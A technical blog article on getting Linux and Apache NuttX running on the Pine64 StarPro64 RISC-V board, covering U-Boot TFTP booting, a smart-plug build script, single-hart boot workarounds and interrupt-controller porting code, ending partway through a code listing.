    StarPro64 with USB Fan

    Something is smelling like barbecue?

    Whoa StarPro64 is on fire: Drop it, stop it and power off! StarPro64 will show PLL Errors when it overheats…

    pll failed.
    pll failed.
    pll failed.

    Also watch for Thermal Errors when booting Linux…

    thermal thermal_zone0: thermal0:
    critical temperature reached, shutting down
    reboot: HARDWARE PROTECTION shutdown (Temperature too high)

    Install a USB Fan, preferably something stronger. (Pic above, boxed up with IKEA 365+)

    But don’t power it with the USB Port on StarPro64! Instead, connect it to our Smart Power Plug.

    Anything else we should worry about?

    The MicroSD Interface wasn’t working well on our Prototype StarPro64. The MicroSD Card deactivated itself after a bit of U-Boot Access.

    Hence the Headless Ironman: USB Drive on StarPro64…

    Headless Ironman: USB Drive on StarPro64

    Earlier we flashed Linux to eMMC. Can we boot Linux now?

    Yep just power up StarPro64. eMMC will Boot Linux

    U-Boot menu
    1:      RockOS GNU/Linux 6.6.73-win2030
    2:      RockOS GNU/Linux 6.6.73-win2030 (rescue target)
    Enter choice: 1:        RockOS GNU/Linux 6.6.73-win2030
    Retrieving file: /vmlinuz-6.6.73-win2030
    Retrieving file: /initrd.img-6.6.73-win2030
    append: root=PARTUUID=b0f77ad6-36cd-4a99-a8c0-31d73649aa08 console=ttyS0,115200 root=PARTUUID=b0f77ad6-36cd-4a99-a8c0-31d73649aa08 rootfstype=ext4 rootwait rw earlycon selinux=0 LANG=en_US.UTF-8
    
    Retrieving file: /dtbs/linux-image-6.6.73-win2030/eswin/eic7700-pine64-starpro64.dtb
       Uncompressing Kernel Image
    Moving Image from 0x84000000 to 0x80200000, end=81e63000
    ## Flattened Device Tree blob at 88000000
       Booting using the fdt blob at 0x88000000
    Working FDT set to 88000000
    ERROR: reserving fdt memory region failed (addr=fffff000 size=1000 flags=4)
       Using Device Tree in place at 0000000088000000, end 0000000088027af4
    Working FDT set to 88000000
    
    Starting kernel ...
    Linux version 6.6.73-win2030 (riscv@riscv-builder) (riscv64-unknown-linux-gnu-gcc () 13.2.0, GNU ld (GNU Binutils) 2.42) #2025.01.23.02.46+aeb0f375c SMP Thu Jan 23 03:08:39 UTC 2025
    Machine model: Pine64 StarPro64
    ...
    mmc0: Timeout waiting for hardware interrupt.
    mmc0: sdhci: ============ SDHCI REGISTER DUMP ===========
    mmc0: sdhci: Sys addr:  0x00000008 | Version:  0x00000005
    mmc0: sdhci: Blk size:  0x00007200 | Blk cnt:  0x00000000

    Sadly the Preview Version of RockOS won’t boot correctly on our Prototype StarPro64 (pic below). Hopefully we’ll sort this out real soon and do some Serious NPU LLM!

    (See the Boot Log)

    RockOS won’t boot correctly on our Prototype StarPro64

    Bummer. What else can we boot on StarPro64?

    Let’s snoop around U-Boot Bootloader. And figure out how to boot Apache NuttX RTOS.

    Power up StarPro64 and press Ctrl-C until U-Boot stops. At the U-Boot Prompt: We enter these commands…

    $ help
    printenv  - print environment variables
    saveenv   - save environment variables to persistent storage
    net       - NET sub-system
    dhcp      - boot image via network using DHCP/TFTP protocol
    tftpboot  - load file via network using TFTP protocol
    fdt       - flattened device tree utility commands
    booti     - boot Linux kernel 'Image' format from memory
    
    $ printenv
    fdt_addr_r=0x88000000
    kernel_addr_r=0x84000000
    loadaddr=0x80200000

    (See the U-Boot Log)

    A-ha! This says…

    • U-Boot supports booting over TFTP: Trivial File Transfer Protocol

    • It will load the Kernel Image (Linux / NuttX) into RAM at 0x8400 0000

    • Then it will move the Kernel Image to 0x8020 0000 and boot there

    • Also it loads the Device Tree into 0x8800 0000

    Thanks U-Boot! You told us everything we need to Boot NuttX…

    Booting NuttX over TFTP

    How to boot NuttX over TFTP? (Pic above)

    1. Install our TFTP Server: Follow the instructions here

    2. Copy these files to our TFTP Server…

      NuttX Image: Image

      Device Tree: eic7700-evb.dtb

      Like so…

      ## Download the NuttX Image and Device Tree
      wget https://github.com/lupyuen2/wip-nuttx/releases/download/starpro64-1/Image
      wget https://github.com/lupyuen/nuttx-starpro64/raw/refs/heads/main/eic7700-evb.dtb
      
      ## Copy the NuttX Image and Device Tree to our TFTP Server
      scp Image tftpserver:/tftpboot/Image-starpro64
      scp eic7700-evb.dtb tftpserver:/tftpboot/
      ssh tftpserver ls -l /tftpboot/

      (How to Build NuttX ourselves)

      (NuttX won’t read the Device Tree)

    3. Power up StarPro64 and press Ctrl-C until U-Boot stops

    4. At the U-Boot Prompt: Enter these commands…

      ## Check if the Network Adapter is alive
      ## "eth0 : ethernet@50400000 f6:70:f9:6e:73:ae active"
      net list
      
      ## Set the U-Boot TFTP Server
      ## TODO: Change to your TFTP Server
      setenv tftp_server 192.168.31.10
      
      ## Save the U-Boot Config for future reboots
      saveenv
      
      ## Fetch the IP Address over DHCP
      ## Load the NuttX Image from TFTP Server
      ## kernel_addr_r=0x84000000
      dhcp ${kernel_addr_r} ${tftp_server}:Image-starpro64
      
      ## Load the Device Tree from TFTP Server
      ## fdt_addr_r=0x88000000
      ## TODO: Fix the Device Tree, it's not needed by NuttX
      tftpboot ${fdt_addr_r} ${tftp_server}:eic7700-evb.dtb
      
      ## Set the RAM Address of Device Tree
      ## fdt_addr_r=0x88000000
      ## TODO: Fix the Device Tree, it's not needed by NuttX
      fdt addr ${fdt_addr_r}
      
      ## Boot the NuttX Image with the Device Tree
      ## kernel_addr_r=0x84000000
      ## fdt_addr_r=0x88000000
      ## TODO: Fix the Device Tree, it's not needed by NuttX
      booti ${kernel_addr_r} - ${fdt_addr_r}

      (U-Boot dropping chars? Try iTerm > Edit > Paste Special > Paste Slowly)

    5. NuttX boots OK on StarPro64 and passes OSTest yay! (Pic below)

      NuttShell (NSH) NuttX-12.4.0
      nsh> uname -a
      NuttX 12.4.0 83424f8d26 Feb 24 2025 06:50:22 risc-v starpro64
      
      nsh> hello
      Hello, World!!
      
      nsh> getprime
      getprime took 148 msec    
      
      nsh> ostest
      ostest_main: Exiting with status 0

      (See the NuttX Log)

      (Watch the Demo on YouTube)

    6. How did we port NuttX to StarPro64? Check the details here…

      “Port NuttX to StarPro64”

    NuttX boots OK on StarPro64 yay!

    We type these commands EVERY TIME we boot?

    We can automate: Just do this once, and NuttX will Auto-Boot whenever we power up…

    ## Add the Boot Command for TFTP
    setenv bootcmd_tftp 'dhcp ${kernel_addr_r} ${tftp_server}:Image-starpro64 ; tftpboot ${fdt_addr_r} ${tftp_server}:eic7700-evb.dtb ; fdt addr ${fdt_addr_r} ; booti ${kernel_addr_r} - ${fdt_addr_r}'
    
    ## Save it for future reboots
    saveenv
    
    ## Test the Boot Command for TFTP, then reboot
    run bootcmd_tftp
    
    ## Remember the Original Boot Command: `bootflow scan -lb`
    setenv orig_bootcmd "$bootcmd"
    
    ## Prepend TFTP to the Boot Command: `run bootcmd_tftp ; bootflow scan -lb`
    setenv bootcmd "run bootcmd_tftp ; $bootcmd"
    
    ## Save it for future reboots
    saveenv

    Next comes the fun part that turns StarPro64 into a totally different beast from Star64…

    (U-Boot dropping chars? Try iTerm > Edit > Paste Special > Paste Slowly)

    (How to Undo Auto-Boot? Allow Static IP?)

    StarPro64 with Touchscreen

    Oh really? Large Language Model on Single-Board Computer? (Eyes roll)

    Hear me out…

    1. 20 TOPS INT8: That’s the spec of the speedy Neural Processing Unit (NPU) inside StarPro64. (20 Trillion Ops Per Second for 8-bit Integers)

      Yeah an Offline Disconnected LLM will run (somewhat) OK on any CPU. But this NPU is designed for such LLMs. (Goodbye “TensorFlow Lite”)

    2. Qwen LLM runs locally on EIC7700X NPU today. Probably Next: Llama LLM and DeepSeek LLM?

      (Qwen 2 with 0.5 Billion Parameters, pic below)

      Qwen LLM on ETC7700X NPU

    3. Offline Disconnected LLM on SBC might be useful for Smart Home Security

      “Hi LLM: Please connect my Home Security System to this Doorbell Camera and my IKEA Zigbee Lights and Xiaomi Motion Sensor and Samsung TV”

    4. Creature Sensor Maybe? A Remote Sensor that uses Cameras to identify Rainforest Critters and Underwater Creatures. But everything it sees becomes ultra-compressed into 16 bytes of text

      “DUCK!” “OCTOPUS!” (Pic below)

    5. EIC7700X NPU Driver is Dual-Licensed: BSD and GPL. Which means we can run it on all kinds of software platforms and create interesting apps.

    6. Will it be Expensive? We hear that StarPro64 will be priced super affordably. Works with a Touchscreen too. (Pic above)

      This is the right time to experiment with an Offline Disconnected LLM!

    LLM Creature Sensor: A Remote Sensor that uses Cameras to identify Rainforest Critters and Underwater Creatures. But everything it sees becomes ultra-compressed into 16 bytes of text

    (Here’s an idea for Sci-Fi Horror: We install an LLM Sensor in a Remote Uninhabited Island. One day we receive sinister words from our LLM Sensor: “EVIL!”, “DEATH!”, “DOOM!”…)

    Isn’t Linux a little wonky on StarPro64?

    Ah here’s our opportunity to create a “Power Efficient” (?) LLM with NuttX…

    Odd name innit: Qwen?

    Qwen will sound confusing to Bilingual Folks…

    • It’s NOT supposed to rhyme with Gwen Stefani / Gwen Stacy

    • Instead it’s pronounced “Q Wen”

    • And it confuses me: “Q = Question” and “Wen = 问 = Question”, thus contracting to “QQ”, which means “Bouncy”

    • Thankfully “Q Wen” actually means something: “千问” (Ask a Thousand Questions, “Qian1 Wen4”)

    • Which is short for “通义千问” (Tong1 Yi4 Qian1 Wen4), meaning “通情,达义”

    StarPro64 with Smart Power Plug

    Flipping StarPro64 on and off. Again and again. Must be an easier way?

    Try a Smart Power Plug (pic above), integrated with our Build Script.

    In our Demo Video: Skip to 00:35 and watch our Build Script auto-power up StarPro64…

    1. Our Script will build the NuttX Image and copy to TFTP Server

    2. Power StarPro64 Off then On

    3. Wait Manually for Testing to Complete (“Press Enter”)

    4. And Power Off StarPro64

    How it works? Here’s our Build Script: run.sh

    ## Omitted: Build the NuttX Image and copy to TFTP Server
    ## make -j ...
    
    ## Get the Home Assistant Token, copied from http://localhost:8123/profile/security
    ## export token=xxxx
    . $HOME/home-assistant-token.sh
    
    ## Power Off the SBC
    curl \
      -X POST \
      -H "Authorization: Bearer $token" \
      -H "Content-Type: application/json" \
      -d '{"entity_id": "automation.starpro64_off"}' \
      http://localhost:8123/api/services/automation/trigger
    
    ## Power On the SBC
    curl \
      -X POST \
      -H "Authorization: Bearer $token" \
      -H "Content-Type: application/json" \
      -d '{"entity_id": "automation.starpro64_on"}' \
      http://localhost:8123/api/services/automation/trigger
    
    ## Wait Manually for SBC Testing to complete
    ## Don't wait too long, it will overheat!
    echo Press Enter to Power Off
    read
    
    ## Power Off the SBC, because it will overheat!
    ## Excessive Heatiness needs Oldenlandia Cooling Water?  
    curl \
      -X POST \
      -H "Authorization: Bearer $token" \
      -H "Content-Type: application/json" \
      -d '{"entity_id": "automation.starpro64_off"}' \
      http://localhost:8123/api/services/automation/trigger

    (See the Build Script)

    (See the Build Log)

    Smart Power Plug in IKEA App and Google Home

    This script assumes that we have…

    Smart Power Plug in Home Assistant

    Smart Power Plug might disconnect USB UART sometimes?

    To work around this: We run a loop for the UART Terminal

    ## First Time Only
    echo "defscrollback 1000000" >> ~/.screenrc
    
    ## On Power Off: USB Serial might disconnect
    ## So we reconnect forever
    set -x
    for (( ; ; )) do 
      screen /dev/ttyUSB* 115200
      sleep 5
    done

    How to save the Entire Console Log from screen?

    Inside screen: Press this Magic Konami Sequence…

    Ctrl-a [
    g <Space>
    G <Enter>
    Ctrl-a :writebuf

    Everything gets saved into /tmp/screen-exchange

    (We could actually allow a Remote Developer to boot and test NuttX on StarPro64… From anywhere in the world!)

    Remember our USB Fan? It goes into our Smart Power Plug as a Power Jenga like so…

    USB Fan goes into our Smart Power Plug as a Power Jenga

    We’re seeking volunteers to build NuttX Drivers for StarPro64 (GPIO, SPI, I2C, MIPI CSI / DSI, Ethernet, WiFi, NPU, …) Please lemme know!

    Right now we’re upstreaming StarPro64 to NuttX Mainline

    Maybe we’ll create a TinyEMU Emulator for StarPro64? 🤔

    Special Thanks to My Sponsors for supporting my writing. Your support means so much to me 🙏

    Got a question, comment or suggestion? Create an Issue or submit a Pull Request here…

    lupyuen.org/src/starpro64.md

    NuttX boots only on Hart 0

    Multiple Harts are problematic. Why?

    Inside EIC7700X SoC: We have Four Harts (RISC-V CPU Cores) numbered 0 to 3.

    This SoC will boot OpenSBI on Any Random Hart, 0 to 3! Which means U-Boot and NuttX will subsequently boot on the Same Random Hart.

    What’s the problem?

    NuttX assumes that it always Boots on Hart 0. (Pic above)

    When NuttX boots on Harts 1 to 3: Our RISC-V Boot Code calls riscv_set_inital_sp. Which will fail: riscv_macros.S

    ## Set inital sp for riscv core. This function should be only called when initing.
    ## TODO: Support Non-Zero Boot Hart.
    .macro riscv_set_inital_sp base, size, hartid
      la      t0, \base
      li      t1, \size
      mul     t1, \hartid, t1
      add     t0, t0, t1
    
      ## Ensure the last XCPTCONTEXT_SIZE is reserved for non boot CPU
      bnez \hartid, 998f
      li   t1, STACK_ALIGN_DOWN(\size)
      j    999f
    998:
      li   t1, STACK_ALIGN_DOWN(\size - XCPTCONTEXT_SIZE)
    999:
      add  t0, t0, t1
      mv   sp, t0
    .endm

    How to fix this?

    Our workaround is to Always Reboot NuttX on Hart 0

    1. If Boot Hart is Not 0:

      Restart NuttX with Hart 0

    2. If Boot Hart is 0:

      Continue Starting NuttX

    Harts vs CPUs: What’s the difference?

    NuttX insists on booting with CPU 0. Otherwise it fails with this nx_start Error

    [CPU2] dump_assert_info:
    Assertion failed up_cpu_index() == 0: 
    at file: init/nx_start.c:745 task(CPU2):
    CPU2 IDLE process: Kernel 0x802019a6

    That’s why we Renumber the CPUs: Boot Hart is always CPU 0. Other Harts become CPUs 1 to 3. For Example: If boot_hart=2 then…

    • hart=2, cpu=0
    • hart=0, cpu=1
    • hart=1, cpu=2
    • hart=3, cpu=3

    Can’t we use One Hart and ignore the Other Harts?

    OK Mister Cold-Harted: We tried Enabling One Hart Only (CPU 0). But OSTest hangs at sem_test

    ## OSTest hangs for StarPro64 when we enable One Hart only...
    user_main: semaphore test
    sem_test: Initializing semaphore to 0
    sem_test: Starting waiter thread 1
    sem_test: Set thread 1 priority to 191
    ## Oops: Thread 1 is NOT started!
    
    sem_test: Starting waiter thread 2
    sem_test: Set thread 2 priority to 128
    waiter_func: Thread 2 Started
    
    ## Oops: Semaphore Value should be -1!
    waiter_func: Thread 2 initial semaphore value = 0
    waiter_func: Thread 2 waiting on semaphore
    ## Hangs here

    Compare the above with SG2000 sem_test

    ## OSTest runs OK for SG2000...
    user_main: semaphore test
    sem_test: Initializing semaphore to 0
    sem_test: Starting waiter thread 1
    sem_test: Set thread 1 priority to 191
    ## Yep Thread 1 is started
    waiter_func: Thread 1 Started
    
    sem_test: Starting waiter thread 2
    waiter_func: Thread 1 initial semaphore value = 0
    sem_test: Set thread 2 priority to 128
    waiter_func: Thread 1 waiting on semaphore
    waiter_func: Thread 2 Started
    
    ## Yep Semaphore Value is -1
    waiter_func: Thread 2 initial semaphore value = -1
    waiter_func: Thread 2 waiting on semaphore
    sem_test: Starting poster thread 3
    ## Completes successfully

    Here’s the problem: sem_test calls nx_pthread_create to create Thread #1

    int nx_pthread_create(...) { ...
    #ifdef CONFIG_SMP
      // pthread_setup_scheduler() will set the affinity mask by inheriting the
      // setting from the parent task.  We need to override this setting
      // with the value from the pthread attributes unless that value is
      // zero:  Zero is the default value and simply means to inherit the
      // parent thread's affinity mask.
      if (attr->affinity != 0) {
        ptcb->cmn.affinity = attr->affinity;
      }
    #endif

    But…

    • Our New Thread defaults to No CPU Affinity

    • Thus it Lacks Affinity for CPU 0

    • So it gets allocated to Another CPU

    • Which never runs!

    Hence sem_test loops forever waiting for the Semaphore Value to change.

    (Watch the Demo on YouTube)

    (See the NuttX Log)

    In Future: How to enable Multiple Harts?

    To Enable Multiple Harts in future, we undo these changes…

    Remember to update the StarPro64 defconfig

    ## Enable SMP with 4 CPUs
    CONFIG_SMP=y
    CONFIG_SMP_NCPUS=4

    And remember to fix riscv_set_inital_sp. Meanwhile let’s run everything on Hart 0…

    NuttX Build for StarPro64

    Earlier we booted Image-starpro64 over TFTP. How to get the file?

    Download the file Image from below and rename it Image-starpro64

    If we prefer to build NuttX ourselves…

    1. Install the Build Prerequisites, skip the RISC-V Toolchain…

      “Install Prerequisites”

    2. Download the RISC-V Toolchain for riscv-none-elf (xPack)…

      “xPack GNU RISC-V Embedded GCC Toolchain for 64-bit RISC-V”

    3. Download and Build NuttX for StarPro64 (work-in-progress)…

      git clone https://github.com/lupyuen2/wip-nuttx nuttx --branch starpro64
      git clone https://github.com/lupyuen2/wip-nuttx-apps apps --branch starpro64
      cd nuttx
      tools/configure.sh milkv_duos:nsh
      
      ## Build the NuttX Kernel and Apps
      make -j
      make -j export
      pushd ../apps
      ./tools/mkimport.sh -z -x ../nuttx/nuttx-export-*.tar.gz
      make -j import
      popd
      
      ## Generate Initial RAM Disk
      ## Prepare a Padding with 64 KB of zeroes
      ## Append Padding and Initial RAM Disk to NuttX Kernel
      genromfs -f initrd -d ../apps/bin -V "NuttXBootVol"
      head -c 65536 /dev/zero >/tmp/nuttx.pad
      cat nuttx.bin /tmp/nuttx.pad initrd \
        >Image
      
      ## Copy the NuttX Image and Device Tree to TFTP Server
      wget https://github.com/lupyuen/nuttx-starpro64/raw/refs/heads/main/eic7700-evb.dtb
      scp Image tftpserver:/tftpboot/Image-starpro64
      scp eic7700-evb.dtb tftpserver:/tftpboot/
      ssh tftpserver ls -l /tftpboot
      
      ## In U-Boot: Boot NuttX over TFTP
      ## setenv tftp_server 192.168.31.10 ; dhcp ${kernel_addr_r} ${tftp_server}:Image-starpro64 ; tftpboot ${fdt_addr_r} ${tftp_server}:eic7700-evb.dtb ; fdt addr ${fdt_addr_r} ; booti ${kernel_addr_r} - ${fdt_addr_r}

      (See the Build Script)

      (See the Build Log)

      (See the Build Outputs)

    4. The steps above assume that we’ve installed our TFTP Server, according to the instructions here

    5. Then follow these steps to boot NuttX on StarPro64…

      “Boot NuttX over TFTP”

    6. Powering StarPro64 on and off can get tiresome. Try a Smart Power Plug, integrated with our Build Script…

      “Smart Power Plug”

    7. How did we port NuttX to StarPro64? Check the details here…

      “Port NuttX to StarPro64”

    Virtual Memory for NuttX Apps

    Why the RAM Disk? Isn’t NuttX an RTOS?

    StarPro64 uses a RAM Disk because it runs in NuttX Kernel Mode (instead of the typical Flat Mode). This means we can do Memory Protection and Virtual Memory for Apps. (Pic above)

    But it also means we need to bundle the NuttX Apps as ELF Files, hence the RAM Disk…

    Most of the NuttX Platforms run on NuttX Flat Mode, which has NuttX Apps Statically-Linked into the NuttX Kernel.

    NuttX Flat Mode works well for Small Microcontrollers. But StarPro64 and other SoCs will need the more sophisticated NuttX Kernel Mode

    NuttX boots OK on StarPro64 yay!

    How did we port NuttX to StarPro64? In under One Week?

    We took the NuttX Port of Milk-V Duo S (Oz64 SG2000) and tweaked it for StarPro64 EIC7700X, with these minor modifications…

    Here’s what we changed…

    §14.1 RISC-V Boot Code

    arch/risc-v/src/eic7700x/eic7700x_head.S

    This is the RISC-V Boot Code that runs first when U-Boot Bootloader starts NuttX.

    In the Linux Kernel Header: We modified the Kernel Size based on U-Boot (fdt_addr_r - kernel_addr_r)

    This ensures that the Entire NuttX Image (including Initial RAM Disk) will be copied correctly from kernel_addr_r (0x8400_0000) to loadaddr (0x8020_0000)

    /* Linux Kernel Header*/
    __start:
      ...
      .quad  0x4000000  /* Kernel size (fdt_addr_r-kernel_addr_r) */

    The Original Code assumes that we always Boot at Hart 0. But EIC7700X will Boot From Any Hart. (0 to 3)

    This modification allows NuttX to Boot from any Hart…

      /* TODO SMP: Enable this for SMP
      /* If a0 (hartid) >= t1 (the number of CPUs), stop here
      blt  a0, t1, 3f
      csrw CSR_SIE, zero
      wfi
      */
    
    3:
      /* Set stack pointer to the idle thread stack. Assume Hart 0. */
      li a2, 0
      riscv_set_inital_sp EIC7700X_IDLESTACK_BASE, SMP_STACK_SIZE, a2
    
      /* TODO SMP: Enable this for SMP
      riscv_set_inital_sp EIC7700X_IDLESTACK_BASE, SMP_STACK_SIZE, a0
      */

    (Previously here)

    Right now we support One Single Hart for EIC7700X. “TODO SMP” flags the code that will be modified (in future) to support Multiple Harts for EIC7700X.

    (Multiple Harts explained)

    §14.2 NuttX Start Code

    arch/risc-v/src/eic7700x/eic7700x_start.c

    NuttX boots here, called by the RISC-V Boot Code (from above). We made these changes to allow Booting from Any Hart

    1. If Boot Hart is Not 0:

      Restart NuttX with Hart 0

    2. If Boot Hart is 0:

      Continue Starting NuttX

    // We remember the Boot Hart ID (0 to 3)
    int g_eic7700x_boot_hart = -1;
    
    // NuttX boots here, called by the RISC-V Assembly Boot Code
    void eic7700x_start(int mhartid) {
    
      // If Boot Hart is not 0: Restart NuttX with Hart 0
      if (mhartid != 0) {
    
        //  Clear the BSS and Restart with Hart 0
        //  __start points to our RISC-V Assembly Start Code
        eic7700x_clear_bss();
        boot_secondary(0, (uintptr_t)&__start);
    
        // Let this Hart idle forever (while Hart 0 runs)
        while (true) { asm("WFI"); }  
        PANIC();  // Should never come here
      }
    
      // Else Boot Hart is 0: We have successfully booted NuttX on Hart 0!
      if (g_eic7700x_boot_hart < 0) {
    
        // Init the globals once only. Remember the Boot Hart.
        // Clear the BSS
        g_eic7700x_boot_hart = mhartid;
        eic7700x_clear_bss();
    
        // TODO SMP: Start the Other Harts by calling OpenSBI
        // eic7700x_boot_secondary();
    
        // Copy the RAM Disk
        // Initialize the per CPU areas
        eic7700x_copy_ramdisk();
        riscv_percpu_add_hart(mhartid);
      }
      // Omitted: Call eic7700x_start_s

    (Previously here)

    The code below will be used (in future) to support Multiple Harts

    // Boot NuttX on the Hart
    void eic7700x_start_s(int mhartid) {
    
      // Configure the FPU
      // If this is not the Boot Hart: Jump to cpux
      riscv_fpuconfig();
      if (mhartid != g_eic7700x_boot_hart) { goto cpux; }
    
      // Omitted: Boot Hart starts here and calls nx_start()
      ...
    
    cpux:
      // TODO SMP: Non-Boot Hart starts here
      // We init the NuttX CPU
      riscv_cpu_boot(mhartid);

    (Previously here)

    How to Restart NuttX on Hart 0? By calling OpenSBI, adapted from riscv_sbi.c

    // We start a Hart (0 to 3) by calling OpenSBI
    // addr points to our RISC-V Assembly Start Code
    static int boot_secondary(uintreg_t hartid, uintreg_t addr) {
    
      // Make an ECALL to OpenSBI
      sbiret_t ret = sbi_ecall(
        SBI_EXT_HSM, SBI_EXT_HSM_HART_START,
        hartid, addr, 0, 0, 0, 0
      );
    
      // Check for OpenSBI Errors
      if (ret.error < 0) { _err("Boot Hart %d failed\n", hartid); PANIC(); }
      return 0;
    }
    
    // Make an ECALL to OpenSBI
    static sbiret_t sbi_ecall(unsigned int extid, unsigned int fid, uintreg_t parm0, uintreg_t parm1, uintreg_t parm2, uintreg_t parm3, uintreg_t parm4, uintreg_t parm5) {
      register long r0 asm("a0") = (long)(parm0);
      register long r1 asm("a1") = (long)(parm1);
      register long r2 asm("a2") = (long)(parm2);
      register long r3 asm("a3") = (long)(parm3);
      register long r4 asm("a4") = (long)(parm4);
      register long r5 asm("a5") = (long)(parm5);
      register long r6 asm("a6") = (long)(fid);
      register long r7 asm("a7") = (long)(extid);
      sbiret_t ret;
    
      asm volatile
        (
         "ecall"
         : "+r"(r0), "+r"(r1)
         : "r"(r2), "r"(r3), "r"(r4), "r"(r5), "r"(r6), "r"(r7)
         : "memory"
         );
      ret.error = r0;
      ret.value = (uintreg_t)r1;
      return ret;
    }
    
    // OpenSBI returns an Error Code and Result Value
    struct sbiret_s {
      intreg_t    error;
      uintreg_t   value;
    };
    typedef struct sbiret_s sbiret_t;
    
    // These are the Standard OpenSBI Extension Codes
    #define SBI_EXT_HSM (0x0048534D)
    #define SBI_EXT_HSM_HART_START (0x0)

    (Previously here)

    For Multiple Harts in future: We shall start the other Non-Boot Harts by calling OpenSBI…

    // TODO SMP: Start the other Non-Boot Harts by calling OpenSBI
    static void eic7700x_boot_secondary(void) {
      for (int i = 0; i < CONFIG_SMP_NCPUS; i++) {
        if (i == g_eic7700x_boot_hart) { continue; }
        boot_secondary(i, (uintptr_t)&__start);
      }
    }

    (Previously here)

    For Multiple Harts in future: NuttX insists on Booting with CPU 0 Only. Thus we set Boot Hart as CPU 0, and we Renumber the Other Harts…

    // TODO SMP: Convert Hart ID to CPU ID.
    // Boot Hart is CPU 0. Renumber the Other Harts.
    int weak_function riscv_hartid_to_cpuid(int hart) {
      if (hart == g_eic7700x_boot_hart)
        { return 0; }
      else if (hart < g_eic7700x_boot_hart)
        { return hart + 1; }
      else
        { return hart; }
    }
    
    // TODO SMP: Convert CPU ID to Hart ID.
    // Boot Hart is CPU 0. Renumber the Other Harts.
    int weak_function riscv_cpuid_to_hartid(int cpu) {
      if (cpu == 0)
        { return g_eic7700x_boot_hart; }
      else if (cpu < g_eic7700x_boot_hart + 1)
        { return cpu - 1; }
      else
        { return cpu; }
    }

    (Previously here)

    For Example: If boot_hart=2 then…

    • hart=0, cpu=1
    • hart=1, cpu=2
    • hart=2, cpu=0
    • hart=3, cpu=3

    (Multiple Harts explained)

    §14.3 PLIC Interrupt Controller

    arch/risc-v/include/eic7700x/irq.h

    // Number of PLIC External Interrupts supported
    #define EIC7700X_PLIC_IRQS 458
    
    // Offset by RISCV_IRQ_SEXT
    #define NR_IRQS (RISCV_IRQ_SEXT + EIC7700X_PLIC_IRQS)

    (Previously here)

    That’s because EIC7700X supports 458 External Interrupts


    arch/risc-v/src/eic7700x/hardware/eic7700x_memorymap.h

    // PLIC Base Address
    #define EIC7700X_PLIC_BASE 0x0C000000ul

    (Previously here)

    PLIC Base Address is specified here…


    arch/risc-v/src/eic7700x/hardware/eic7700x_plic.h

    // PLIC Interrupt Priority: Single Global Register
    #define EIC7700X_PLIC_PRIORITY (EIC7700X_PLIC_BASE + 0x000000)
    
    // Hart 0 S-Mode Interrupt Enable and Offset Between Harts
    #define EIC7700X_PLIC_ENABLE0     (EIC7700X_PLIC_BASE + 0x002080)
    #define EIC7700X_PLIC_ENABLE_HART 0x100
    
    // Hart 0 S-Mode Priority Threshold and Offset Between Harts
    #define EIC7700X_PLIC_THRESHOLD0     (EIC7700X_PLIC_BASE + 0x201000)
    #define EIC7700X_PLIC_THRESHOLD_HART 0x2000
    
    // Hart 0 S-Mode Claim / Complete and Offset Between Harts
    #define EIC7700X_PLIC_CLAIM0     (EIC7700X_PLIC_BASE + 0x201004)
    #define EIC7700X_PLIC_CLAIM_HART 0x2000

    (Previously here)

    Interrupt Enable: PLIC_ENABLE_HART is 0x100 because we skip 0x100 bytes per Hart…

    EIC7700X Tech Ref #1Page 240
    (Skip the M-Modes)
    0x0C00_2080Start Hart 0 S-Mode interrupt enables
    0x0C00_2180Start Hart 1 S-Mode interrupt enables
    0x0C00_2280Start Hart 2 S-Mode interrupt enables

    Priority Threshold: PLIC_THRESHOLD_HART is 0x2000 because we skip 0x2000 bytes per Hart

    Claim / Complete: PLIC_CLAIM_HART is 0x2000 because we skip 0x2000 bytes per Hart

    Which comes from this…

    EIC7700X Tech Ref #1Page 241
    (Skip the M-Modes)
    0x0C20_1000Hart 0 S-Mode Priority Threshold
    0x0C20_1004Hart 0 S-Mode Claim / Complete
    0x0C20_3000Hart 1 S-Mode Priority Threshold
    0x0C20_3004Hart 1 S-Mode Claim / Complete
    0x0C20_5000Hart 2 S-Mode Priority Threshold
    0x0C20_5004Hart 2 S-Mode Claim / Complete

    (Multiple Harts explained)


    arch/risc-v/src/eic7700x/eic7700x_irq.c

    In future we shall support Multiple Harts. That’s why we extended this code to Initialize the Interrupts for Harts 0 to 3…

    // Initialize the Interrupts
    void up_irqinitialize(void) { ...
    
      // Disable all global interrupts
      for (hart = 0; hart < CONFIG_SMP_NCPUS; hart++) {
        addr = EIC7700X_PLIC_ENABLE0 + (hart * EIC7700X_PLIC_ENABLE_HART);
        for (offset = 0; offset < EIC7700X_PLIC_IRQS >> 3; offset += 4) {
          putreg32(0x0, addr + offset);          
        }
      }
    
      // Clear pendings in PLIC
      for (hart = 0; hart < CONFIG_SMP_NCPUS; hart++) {
        addr = EIC7700X_PLIC_CLAIM0 + (hart * EIC7700X_PLIC_CLAIM_HART);
        claim = getreg32(addr);
        putreg32(claim, addr);
      }
    
      // Set irq threshold to 0 (permits all global interrupts)
      for (hart = 0; hart < CONFIG_SMP_NCPUS; hart++) {
        addr = EIC7700X_PLIC_THRESHOLD0 + (hart * EIC7700X_PLIC_THRESHOLD_HART);
        putreg32(0, addr);
      }

    (Previously here)

    We do this to Disable the Interrupts for Boot Hart 0 to 3 (in future)

    // Disable the Interrupt
    void up_disable_irq(int irq) { ...
    
      // Clear enable bit for the irq
      if (0 <= extirq && extirq <= EIC7700X_PLIC_IRQS) {
        addr = EIC7700X_PLIC_ENABLE0 + 
               (g_eic7700x_boot_hart * EIC7700X_PLIC_ENABLE_HART);
        modifyreg32(addr + (4 * (extirq / 32)),
                    1 << (extirq % 32), 0);
      }

    (Previously here)

    And this to Enable the Interrupts for Boot Hart 0 to 3 (in future)

    // Enable the Interrupt
    void up_enable_irq(int irq) { ...
    
      // Set enable bit for the irq
      if (0 <= extirq && extirq <= EIC7700X_PLIC_IRQS) {
        addr = EIC7700X_PLIC_ENABLE0 + 
               (g_eic7700x_boot_hart * EIC7700X_PLIC_ENABLE_HART);
        modifyreg32(addr + (4 * (extirq / 32)),
                    0, 1 << (extirq % 32));
      }

    (Previously here)

    (Multiple Harts explained)


    arch/risc-v/src/eic7700x/eic7700x_irq_dispatch.c

    In future we shall support Multiple Harts. That’s why we extended this code to Dispatch the Interrupt for Boot Hart 0 to 3…

    // Dispatch the Interrupt
    void *riscv_dispatch_irq(uintptr_t vector, uintptr_t *regs) {
      int irq = (vector >> RV_IRQ_MASK) | (vector & 0xf);
      uintptr_t claim = EIC7700X_PLIC_CLAIM0 + 
                        (g_eic7700x_boot_hart * EIC7700X_PLIC_CLAIM_HART);
